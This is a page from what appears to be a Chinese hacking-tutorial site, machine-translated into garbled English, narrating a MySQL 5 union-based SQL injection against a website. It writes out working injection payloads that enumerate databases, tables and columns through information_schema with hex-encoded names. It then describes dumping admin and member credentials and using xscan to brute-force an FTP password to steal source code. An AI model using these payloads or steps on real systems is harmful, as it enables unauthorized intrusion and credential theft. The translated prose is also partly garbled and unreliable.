Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
A simple invasion, does as a temporary measure the Mysql5 injection backup
  Add date: 07/14/2008   Publishing date: 07/14/2008   Hits: 63

Looks for the injection spot, the judgment field number does not raise.
Under the judgment the jurisdiction, the non-root company, does not have the load_file() jurisdiction, cannot select into outfile, the mysql edition be 5 luckily.

Gain storehouse

and 1=2 union select 1,2,3, database(),5…., 87/*

Or

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*

and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*

----------------------------------------------------------------------------------------------
Gain table:

Database transforms hex:admin=0x61646D696E 

and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*

. . . Downward explodes in turn
------------------------------------------------------------------------------------------------
Gain field value:
Table admin=0x61646D696E  
and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*

---------------------------------------------------------------------------------------------------

After blowing out the manager account number, discovered that could not register the backstage. Therefore has exploded 10 set of member account numbers. Reorganized under the account number and the password, throws xscan to run the ftp password, 2 minutes later attains the ftp jurisdiction. Only wants the source code, stops work for the day to this. Not technique content!
Prev:Microsoft SQL Server SA jurisdiction newest invasion method Next:The mainstream raises the power technology comprehensive work with the non-mainstream

Comment:

Category: Home > hacker course
Home